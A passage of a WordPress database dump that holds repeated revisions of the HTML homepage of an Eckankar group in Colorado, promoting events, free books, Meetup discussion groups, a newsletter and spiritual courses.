col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236883,40267,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"margin-top: 24px;\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236872,40266,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 